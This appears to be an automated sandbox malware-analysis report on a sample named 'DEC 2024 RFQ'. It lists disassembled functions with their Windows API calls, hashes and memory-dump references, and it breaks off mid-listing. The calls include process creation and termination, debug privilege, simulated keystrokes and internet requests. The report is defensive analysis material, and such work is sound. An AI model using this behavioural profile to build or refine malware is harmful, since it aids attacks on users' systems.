                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2603140658-3916222277
                                                                                                                      • Opcode ID: c4a5e969eaa483d6cbff5b45f22ae2e3769bdd0bd4558090462e523d8c2ac099
                                                                                                                      • Instruction ID: e9aedccb12ab4b86b9582b747820b97c69a86afe273932418080b7c06e8b4ba2
                                                                                                                      • Opcode Fuzzy Hash: c4a5e969eaa483d6cbff5b45f22ae2e3769bdd0bd4558090462e523d8c2ac099
                                                                                                                      • Instruction Fuzzy Hash: DF417FB160161ABFEF118F50CC89FFE7BADEF09354F004126F9059A191E7749E44ABA1
                                                                                                                      Function 00098C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,000AF910), ref: 00098D28
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,000AF910), ref: 00098D5C
                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00098ED6
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00098F00
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 560350794-0
                                                                                                                      • Opcode ID: 84f238c59ca5f72790dda1dca56ec30234c4b5f1c9d69d9210265ed37b15c450
                                                                                                                      • Instruction ID: 5daa8ed4c3f55667233ea457d5c263c74a7ec437df5764d4b625fa5c11b47eaa
                                                                                                                      • Opcode Fuzzy Hash: 84f238c59ca5f72790dda1dca56ec30234c4b5f1c9d69d9210265ed37b15c450
                                                                                                                      • Instruction Fuzzy Hash: 41F14771A00209AFDF54DF98C884EEEB7B9FF89314F108498F915AB251DB31AE45DB90
                                                                                                                      Function 0009F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0009F6B5
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0009F848
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0009F86C
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0009F8AC
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0009F8CE
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0009FA4A
                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0009FA7C
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0009FAAB
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0009FB22
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4090791747-0
                                                                                                                      • Opcode ID: 53199f5d5a876aa3ba71027737651b69778b79fdb1b9ed910ab9f77e36766345
                                                                                                                      • Instruction ID: 7cd8c5260fa7dd54c787aa584a74824f77881fd15d4b77361d28d34e1532d65c
                                                                                                                      • Opcode Fuzzy Hash: 53199f5d5a876aa3ba71027737651b69778b79fdb1b9ed910ab9f77e36766345
                                                                                                                      • Instruction Fuzzy Hash: 7EE1BF716043029FCB15EF24C881BBABBE5EF85354F18856DF8999B2A2CB31DC41DB52
                                                                                                                      Function 00084CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0008466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00083697,?), ref: 0008468B
                                                                                                                        • Part of subcall function 0008466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00083697,?), ref: 000846A4
                                                                                                                        • Part of subcall function 00084A31: GetFileAttributesW.KERNEL32(?,0008370B), ref: 00084A32
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00084D40
                                                                                                                      • _wcscmp.LIBCMT ref: 00084D5A
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00084D75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 793581249-0
                                                                                                                      • Opcode ID: 3dadbf0ccfe7873710b9ee29c741a2d9a92039b0277382de44ee4a2485ac7efa
                                                                                                                      • Instruction ID: 13aaa46d24e98278f66f0ffeb2fb0d5770cabe9b9bf0c4b04fa218e6de55e667
                                                                                                                      • Opcode Fuzzy Hash: 3dadbf0ccfe7873710b9ee29c741a2d9a92039b0277382de44ee4a2485ac7efa
                                                                                                                      • Instruction Fuzzy Hash: 395144B25083459BC765EBA0DC819DFB3ECAF85350F40092EB6C9D3152EF74A588C756
                                                                                                                      Function 000A8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000A86FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: c9ef8ed2d181b63f67353897d94d3a745d12ce2e9f50a392b0438434e54d1624
                                                                                                                      • Instruction ID: e0c9deee47a137ec18996a25bf6160ce1578b487b55a677404e826352458ed79
                                                                                                                      • Opcode Fuzzy Hash: c9ef8ed2d181b63f67353897d94d3a745d12ce2e9f50a392b0438434e54d1624
                                                                                                                      • Instruction Fuzzy Hash: 8E51C130604254BEEB749BA8DC85FED7BA5EB07760F608125F950EA1A1DF76E980CB40
                                                                                                                      Function 00022B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0005C2F7
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0005C319
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0005C331
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0005C34F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0005C370
                                                                                                                      • DestroyIcon.USER32(00000000), ref: 0005C37F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0005C39C
                                                                                                                      • DestroyIcon.USER32(?), ref: 0005C3AB
                                                                                                                        • Part of subcall function 000AA4AF: DeleteObject.GDI32(00000000), ref: 000AA4E8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2819616528-0
                                                                                                                      • Opcode ID: 2414dbc7b14fcd12f5f35efc6c0a4981d0b5707bf70491a115ce337d296dbd97
                                                                                                                      • Instruction ID: fa661b04686473a7723ad6b8e8b5c7d8ddf0892a977a3879300719daac4f3fd3
                                                                                                                      • Opcode Fuzzy Hash: 2414dbc7b14fcd12f5f35efc6c0a4981d0b5707bf70491a115ce337d296dbd97
                                                                                                                      • Instruction Fuzzy Hash: 5E515870A00719EFEB20DFA4DC45FAE3BE5EB49711F104528F942A72A0DB74AD90DB50
                                                                                                                      Function 0007966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0007A84C
                                                                                                                        • Part of subcall function 0007A82C: GetCurrentThreadId.KERNEL32 ref: 0007A853
                                                                                                                        • Part of subcall function 0007A82C: AttachThreadInput.USER32(00000000,?,00079683,?,00000001), ref: 0007A85A
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0007968E
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000796AB
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 000796AE
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000796B7
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000796D5
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000796D8
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 000796E1
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000796F8
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 000796FB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: f6b2212b9db71968dee2fded102d704d69653d06aef5cb04467e385664eca720
                                                                                                                      • Instruction ID: f3ffb80e29b73b7b689ab4d9d78829482370eb2b9e974754842c62497a2e9922
                                                                                                                      • Opcode Fuzzy Hash: f6b2212b9db71968dee2fded102d704d69653d06aef5cb04467e385664eca720
                                                                                                                      • Instruction Fuzzy Hash: D711E571910A19BEF6106FA0DC89F7A3B1DEB4D750F100425F244AB0E1C9F65C11DAA8
                                                                                                                      Function 00078921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0007853C,00000B00,?,?), ref: 0007892A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,0007853C,00000B00,?,?), ref: 00078931
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0007853C,00000B00,?,?), ref: 00078946
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0007853C,00000B00,?,?), ref: 0007894E
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0007853C,00000B00,?,?), ref: 00078951
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0007853C,00000B00,?,?), ref: 00078961
                                                                                                                      • GetCurrentProcess.KERNEL32(0007853C,00000000,?,0007853C,00000B00,?,?), ref: 00078969
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0007853C,00000B00,?,?), ref: 0007896C
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00078992,00000000,00000000,00000000), ref: 00078986
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: dd237f7d9486022cf79dbbcaaa48ac265bee08d045e71797477bf0fdf32329ec
                                                                                                                      • Instruction ID: 730c11b1066bdb808c4cd8558e9967651656bef62f5285e6d3676d2dc35ba248
                                                                                                                      • Opcode Fuzzy Hash: dd237f7d9486022cf79dbbcaaa48ac265bee08d045e71797477bf0fdf32329ec
                                                                                                                      • Instruction Fuzzy Hash: 0201BBB5640709FFF760ABA5DC4DF6B3BACEB89711F418421FA05DB1A1DA749800CB20
                                                                                                                      Function 00099B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 0-572801152
                                                                                                                      • Opcode ID: 52f32e34418cdf526b21e968a8c9a3d2c1978274fb5b70c243d326efe2540a37
                                                                                                                      • Instruction ID: 17408e2500b340b0b72ecb7b5de4b32673ab0f5b25a8d93c43c567a1b8cbde91
                                                                                                                      • Opcode Fuzzy Hash: 52f32e34418cdf526b21e968a8c9a3d2c1978274fb5b70c243d326efe2540a37
                                                                                                                      • Instruction Fuzzy Hash: 2FC19071A0020A9FDF10DFA8D884AEEB7F5FF48314F14846DE905AB281E771AD41DBA0
                                                                                                                      Function 00099113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2862541840-625585964
                                                                                                                      • Opcode ID: 89f509c4aa6f43cd64b33d9c51d50c119a21037dd5e1ecb91898b8b640076fdd
                                                                                                                      • Instruction ID: 1ef7720eca2e0e9e692128fff35127472ed73948d1840a24555baa7060c4ab55
                                                                                                                      • Opcode Fuzzy Hash: 89f509c4aa6f43cd64b33d9c51d50c119a21037dd5e1ecb91898b8b640076fdd
                                                                                                                      • Instruction Fuzzy Hash: B2919D71A00219EBDF24DFA9C848FAEBBB8EF45710F10815EF515AB281D7709A45DFA0
                                                                                                                      Function 0009975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?,?,00077455), ref: 00077127
                                                                                                                        • Part of subcall function 0007710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 00077142
                                                                                                                        • Part of subcall function 0007710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?,?), ref: 00077150
                                                                                                                        • Part of subcall function 0007710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00077044,80070057,?), ref: 00077160
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00099806
                                                                                                                      • _memset.LIBCMT ref: 00099813
                                                                                                                      • _memset.LIBCMT ref: 00099956
                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00099982
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0009998D
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 000999DB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                      • Opcode ID: da7be3fb0b1be9b05681afc052c92575cc3f71a1a29c9aa29c00d45af1e41009
                                                                                                                      • Instruction ID: 0e79847c5898832bdce1128552f22060baec36a37892c536a4113d439dc4b1b6
                                                                                                                      • Opcode Fuzzy Hash: da7be3fb0b1be9b05681afc052c92575cc3f71a1a29c9aa29c00d45af1e41009
                                                                                                                      • Instruction Fuzzy Hash: F7911671D00229ABDF10DFA5DC85ADEBBB9AF09310F20415AF519A7291DB719A44CFA0
                                                                                                                      Function 000A6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000A6E24
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 000A6E38
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000A6E52
                                                                                                                      • _wcscat.LIBCMT ref: 000A6EAD
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 000A6EC4
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000A6EF2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                      • String ID: SysListView32
                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                      • Opcode ID: 8cb44e2ef5c4b143d2105d2837b6ede62cd6cedcdd72a740f9457d9e05463c0a
                                                                                                                      • Instruction ID: 81f19a366fb6563c508274f5ffa138adc06275f0e3263aba8bdf6e4d1c69daa7
                                                                                                                      • Opcode Fuzzy Hash: 8cb44e2ef5c4b143d2105d2837b6ede62cd6cedcdd72a740f9457d9e05463c0a
                                                                                                                      • Instruction Fuzzy Hash: 38418F70A00349EBEB21DFA4CC85BEA77F8EF09350F14052AF585E7292D6769D848B60
                                                                                                                      Function 0009E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00083C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00083C7A
                                                                                                                        • Part of subcall function 00083C55: Process32FirstW.KERNEL32(00000000,?), ref: 00083C88
                                                                                                                        • Part of subcall function 00083C55: CloseHandle.KERNEL32(00000000), ref: 00083D52
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0009E9A4
                                                                                                                      • GetLastError.KERNEL32 ref: 0009E9B7
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0009E9E6
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0009EA63
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0009EA6E
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0009EAA3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      • Opcode ID: dd4a54e378fefa6172643f6bd3f9e6001ea287c20da64052011421a188e3cd23
                                                                                                                      • Instruction ID: 549f59d30bce4e4ca6893f37569b7aed3daf6f3acf74e99866677f7facc5a369
                                                                                                                      • Opcode Fuzzy Hash: dd4a54e378fefa6172643f6bd3f9e6001ea287c20da64052011421a188e3cd23
                                                                                                                      • Instruction Fuzzy Hash: 5841B9716006019FDB24EF64CCA5FAEB7A5BF40310F088459F9469B2D3CB79AD04DB96
                                                                                                                      Function 00082F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00083033
